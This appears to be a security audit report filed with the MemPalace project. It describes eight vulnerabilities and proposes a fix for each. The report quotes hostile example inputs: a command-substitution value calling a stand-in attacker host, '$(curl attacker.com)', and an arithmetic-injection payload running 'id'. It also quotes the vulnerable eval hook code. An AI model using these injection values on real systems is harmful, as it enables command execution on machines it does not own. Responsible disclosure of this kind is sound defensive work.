Security Audit Report
Hi Milla, Ben, and the MemPalace community!
I ran a full security audit on the v3.2.0 codebase (commit 6614b9b, develop branch) before deploying MemPalace in my own workflow. I found 8 previously unreported vulnerabilities that I'd like to flag — and I'm happy to submit PRs for all of them.
I checked existing issues and PRs before filing this. #401 (security hardening RFC), #477 (search limit), #438 (precompact session_id + regex escape), and #782 (ChromaDB telemetry) cover some related ground, but none of them covers the findings below.
CRITICAL
1. Wikipedia SSRF in entity_registry.py — violates local-first guarantee
File: mempalace/entity_registry.py, lines 176–257
_wikipedia_lookup() makes an outbound HTTPS GET to https://en.wikipedia.org/api/rest_v1/page/summary/{word} whenever research() is called. This is in the core package, not a benchmark or optional module.
- Any entity name extracted during mining gets sent to Wikipedia
- User's IP is disclosed to Wikipedia (and any network observer)
- Directly violates CLAUDE.md: "Privacy by architecture — The system physically cannot send your data because it never leaves your machine"
Additionally, if Wikipedia returns 404, the word is classified as "person" with 0.70 confidence (lines 246–254), which poisons the entity registry with false positives.
Suggested fix: Make research() local-only by default. Require explicit allow_network=True opt-in for Wikipedia lookups, and return "unknown" with low confidence on 404 instead of asserting person.
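A minimal sketch of the opt-in behaviour described above, not the project's actual code. The `ResearchResult` type, the `lookup` callable (standing in for `_wikipedia_lookup()`), and the confidence values are assumptions made for illustration only:

```python
from dataclasses import dataclass
from typing import Callable, Optional, Tuple


@dataclass
class ResearchResult:
    """Hypothetical result type; the real registry may use a plain dict."""
    word: str
    entity_type: str
    confidence: float
    source: str


# Hypothetical lookup signature: returns (http_status, entity_type_or_None).
Lookup = Callable[[str], Tuple[int, Optional[str]]]


def research(word: str, allow_network: bool = False,
             lookup: Optional[Lookup] = None) -> ResearchResult:
    """Classify a word, touching the network only on explicit opt-in."""
    if not allow_network or lookup is None:
        # Default path: nothing leaves the machine.
        return ResearchResult(word, "unknown", 0.0, "local")

    status, entity_type = lookup(word)
    if status == 404:
        # A missing article is not evidence that the word names a person.
        return ResearchResult(word, "unknown", 0.1, "wikipedia-404")
    if status != 200 or entity_type is None:
        return ResearchResult(word, "unknown", 0.0, "wikipedia-error")
    return ResearchResult(word, entity_type, 0.9, "wikipedia")
```

Passing the lookup in as a parameter keeps the default code path free of any network import, which also makes the local-first guarantee easy to assert in a unit test.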
2. Shell injection via eval in mempal_save_hook.sh — stop_hook_active not sanitized
File: hooks/mempal_save_hook.sh, lines 68–80
The save hook uses eval to parse Python output into shell variables. The stop_hook_active field is not passed through the safe() lambda (unlike session_id and transcript_path):
eval $(echo "$INPUT" | python3 -c "
...
safe = lambda s: re.sub(r'[^a-zA-Z0-9_/.\-~]', '', str(s))
print(f'SESSION_ID=\"{safe(sid)}\"')
print(f'STOP_HOOK_ACTIVE=\"{sha}\"') # ← NOT sanitized
print(f'TRANSCRIPT_PATH=\"{safe(tp)}\"')
")
If the JSON input contains "stop_hook_active": "$(curl attacker.com)", bash will execute the command substitution inside eval.
Suggested fix: Validate stop_hook_active is strictly True or False before printing:
sha_raw = data.get('stop_hook_active', False)
sha = 'True' if sha_raw is True or str(sha_raw).lower() in ('true', '1') else 'False'
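As a complementary hardening step (a sketch, not what the hook currently does), the Python side could quote every emitted value with the standard library's `shlex.quote`, so that a field added later without sanitization still cannot inject shell syntax. The function name `shell_assignments` is hypothetical; the JSON field names are the ones shown above:

```python
import json
import shlex


def shell_assignments(raw_json: str) -> str:
    """Render hook input as shell variable assignments that are safe to eval."""
    data = json.loads(raw_json)

    # Collapse the flag to a strict boolean literal, as suggested above.
    sha_raw = data.get("stop_hook_active", False)
    sha = "True" if sha_raw is True or str(sha_raw).lower() in ("true", "1") else "False"

    fields = {
        "SESSION_ID": str(data.get("session_id", "")),
        "STOP_HOOK_ACTIVE": sha,
        "TRANSCRIPT_PATH": str(data.get("transcript_path", "")),
    }
    # shlex.quote wraps anything outside a small safe character set in
    # single quotes, so $(...) and backticks are never expanded by the shell.
    return "\n".join(f"{name}={shlex.quote(value)}" for name, value in fields.items())


if __name__ == "__main__":
    import sys
    print(shell_assignments(sys.stdin.read()))
```

On the shell side the output would need to be consumed as `eval "$(...)"` with the outer double quotes; without them the text is word-split and glob-expanded before `eval` sees it.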
3. transcript_path from stdin opens arbitrary files in hooks_cli.py
File: mempalace/hooks_cli.py, lines 42–77, 124–126
transcript_path is read from the stdin JSON and passed to _count_human_messages() which calls Path(transcript_path).expanduser() and opens the file. No containment check ensures the path is within the expected Claude Code sessions directory.
Suggested fix: Validate the resolved path is under the expected root (e.g., ~/.claude/projects) and has a .jsonl/.json extension before opening.
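The containment check could look roughly like the sketch below. The helper name `safe_transcript_path` and the idea of passing the root as a parameter are assumptions; `~/.claude/projects` is the example root named above:

```python
from pathlib import Path
from typing import Optional, Union

ALLOWED_SUFFIXES = {".jsonl", ".json"}


def safe_transcript_path(raw: str, root: Union[str, Path]) -> Optional[Path]:
    """Return the resolved path if it lies under root, otherwise None."""
    try:
        # resolve() collapses ".." segments and follows symlinks, so the
        # comparison is made on the real location of the file.
        resolved = Path(raw).expanduser().resolve()
        root_resolved = Path(root).expanduser().resolve()
        # relative_to raises ValueError when resolved is outside the root.
        resolved.relative_to(root_resolved)
    except (ValueError, OSError, RuntimeError):
        return None
    if resolved.suffix.lower() not in ALLOWED_SUFFIXES:
        return None
    return resolved
```

A caller would treat `None` as "skip counting" rather than as an error, for example `path = safe_transcript_path(transcript_path, "~/.claude/projects")` before opening anything.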
HIGH
4. Arithmetic injection in mempal_save_hook.sh
File: hooks/mempal_save_hook.sh, lines 120–124
LAST_SAVE=$(cat "$LAST_SAVE_FILE")
SINCE_LAST=$((EXCHANGE_COUNT - LAST_SAVE))
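LAST_SAVE is read from a state file and used directly in $((...)) without validating that it is an integer. Bash arithmetic evaluates a variable's value recursively as an expression, so a state file containing a value such as a[$(id)] triggers the command substitution inside the array subscript.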
Suggested fix:
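LAST_SAVE_RAW=$(cat "$LAST_SAVE_FILE" 2>/dev/null)
LAST_SAVE=0  # fall back to 0 when the state file is missing or malformed
if [[ "$LAST_SAVE_RAW" =~ ^[0-9]+$ ]]; then
    LAST_SAVE=$((10#$LAST_SAVE_RAW))  # force base 10 so leading zeros are not read as octal
fi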
MEDIUM
5. File permissions — 6 locations create sensitive files world-readable
On Linux with the default umask (022), the files below are created with mode 644 and the directories with mode 755, so both are world-readable:
| File | What's exposed |
|---|---|
| hooks_cli.py:84 (~/.mempalace/hook_state/) | Session IDs, timestamps |
| entity_registry.py:311 (entity_registry.json) | Names of all people, relationships, aliases |
| knowledge_graph.py:53 (knowledge_graph.sqlite3) | Every temporal fact ever stored |
| exporter.py:51 (export output directory) | Complete verbatim memory palace |
| config.py:227 (people_map.json) | Name mappings for all people |
| mcp_server.py:92 (WAL file, TOCTOU race) | Write audit log |
Suggested fix: Apply chmod(0o700) to directories and chmod(0o600) to files immediately after creation, with try/except (OSError, NotImplementedError): pass for Windows compatibility.
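One way to apply this without leaving a window between creation and `chmod` is to pass the restrictive mode at creation time. The sketch below is an illustration under that assumption; `write_private` is a hypothetical helper, not an existing MemPalace function:

```python
import os
from pathlib import Path
from typing import Union


def write_private(path: Union[str, Path], data: bytes) -> None:
    """Write data to path so that only the owner can read it."""
    path = Path(path)
    # The mode applies to the leaf directory only; parents created along the
    # way get default permissions, and an existing directory is left as-is.
    path.parent.mkdir(mode=0o700, parents=True, exist_ok=True)

    # Creating the file with 0o600 means it is never world-readable,
    # even briefly.
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "wb") as handle:
        handle.write(data)

    try:
        # Tighten a file that already existed with wider permissions.
        os.chmod(path, 0o600)
    except (OSError, NotImplementedError):
        pass  # best effort on platforms without POSIX permission bits
```

The same pattern does not carry over directly to files that SQLite or ChromaDB create themselves; for those, a `chmod` right after creation, as suggested above, or a restrictive parent directory is the practical option.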
6. Slack transcript role spoofing in normalize.py
File: mempalace/normalize.py, lines 276–306
The Slack JSON parser assigns "user" to the first speaker and "assistant" to the second, purely by position. A crafted Slack export where an attacker's message is first gets stored with role "user", making attacker-written text appear as the memory owner's own words in all future retrieval.
Suggested fix: Label Slack-sourced transcripts with a provenance header indicating multi-party chat origin, and don't assign user/assistant roles to arbitrary speakers.
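A rough sketch of what provenance labelling might look like. The function name, the header wording, and the output format are all hypothetical; the `user` and `text` keys are assumed to be present in the exported message objects:

```python
import re
from typing import Dict, Iterable

# Hypothetical header; the exact wording would be a project decision.
PROVENANCE_HEADER = "[source: slack export; multi-party chat; speakers unverified]"


def normalize_slack(messages: Iterable[Dict]) -> str:
    """Render Slack messages with speaker labels instead of user/assistant roles."""
    lines = [PROVENANCE_HEADER]
    for msg in messages:
        speaker = str(msg.get("user") or "unknown")
        # Restrict the label to a safe character set so it cannot close the
        # bracket or imitate another marker.
        speaker = re.sub(r"[^A-Za-z0-9_.\-]", "_", speaker)
        # Collapse whitespace so message text cannot start a forged line.
        text = " ".join(str(msg.get("text", "")).split())
        if text:
            lines.append(f"[slack:{speaker}] {text}")
    return "\n".join(lines)
```

With this shape no message is ever stored under the role "user", so retrieval can distinguish third-party chat text from the memory owner's own words.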
7. palace_path from env var not normalized
File: mempalace/config.py, lines 143–148
MEMPALACE_PALACE_PATH from environment is used as-is, without os.path.abspath() or expanduser(). This differs from the --palace CLI arg (which gets abspath at mcp_server.py:62). A value with ../ components could redirect palace storage.
Suggested fix: Apply os.path.abspath(os.path.expanduser(env_val)) in the config loader.
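In the config loader this could be as small as the sketch below. The helper name `resolve_palace_path` and the default location are placeholders chosen for illustration, not values taken from the codebase:

```python
import os
from typing import Mapping

# Placeholder default, for illustration only.
DEFAULT_PALACE_PATH = "~/.mempalace/palace"


def resolve_palace_path(environ: Mapping[str, str],
                        default: str = DEFAULT_PALACE_PATH) -> str:
    """Return an absolute, user-expanded palace path from the environment."""
    raw = environ.get("MEMPALACE_PALACE_PATH", "").strip()
    # expanduser handles a leading "~"; abspath anchors relative paths to
    # the current directory and collapses "../" components.
    return os.path.abspath(os.path.expanduser(raw or default))
```

Called as `resolve_palace_path(os.environ)`, this gives the environment variable the same treatment the `--palace` argument already receives.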
8. Date fields in KG tools not validated
File: mempalace/mcp_server.py, line 748; knowledge_graph.py, lines 219–242
as_of, valid_from, valid_to parameters from MCP calls reach SQLite without format validation. While parameterized queries prevent SQL injection, invalid date strings silently break temporal filtering (queries return empty results instead of matching facts).
Suggested fix: Add an ISO-8601 date format validator at the MCP boundary:
_DATE_RE = re.compile(r'^\d{4}-(?:0[1-9]|1[0-2])(?:-(?:0[1-9]|[12]\d|3[01]))?$')
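The regex alone still accepts impossible dates such as 2023-02-31. A sketch of a boundary validator that adds a calendar check for full dates follows; `validate_date` is a hypothetical helper name, and the `re.ASCII` flag is an addition to the pattern above so that only ASCII digits match:

```python
import re
from datetime import date
from typing import Optional

_DATE_RE = re.compile(
    r'^\d{4}-(?:0[1-9]|1[0-2])(?:-(?:0[1-9]|[12]\d|3[01]))?$', re.ASCII
)


def validate_date(value: Optional[str], field: str) -> Optional[str]:
    """Accept None, YYYY-MM, or a real YYYY-MM-DD date; raise ValueError otherwise."""
    if value is None:
        return None
    # fullmatch also rejects a trailing newline, which "$" alone would allow.
    if not isinstance(value, str) or not _DATE_RE.fullmatch(value):
        raise ValueError(f"{field} must be YYYY-MM or YYYY-MM-DD, got {value!r}")
    if len(value) == 10:
        try:
            date.fromisoformat(value)  # rejects dates like 2023-02-31
        except ValueError:
            raise ValueError(f"{field} is not a valid calendar date: {value!r}") from None
    return value
```

Raising at the MCP boundary turns a silently empty result set into an explicit error that the calling client can report.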
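Relationship to existing issues/PRs
#438 covers session_id sanitization and regex escaping in the precompact hook. Finding 2 covers the eval issue in the save hook, which #438 does not address.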
Next steps
I'm happy to submit focused PRs for each finding, targeting develop:
fix/security-wikipedia-ssrf — Finding 1
fix/security-hook-injection — Findings 2, 3, 4
fix/security-file-permissions — Finding 5
fix/security-normalize-roles — Finding 6
fix/security-config-validation — Findings 7, 8
Let me know if you'd prefer a different grouping or if any of these are already being worked on internally.
Thanks for building MemPalace — it's a great project and I want to help make it solid.
— @Kesshite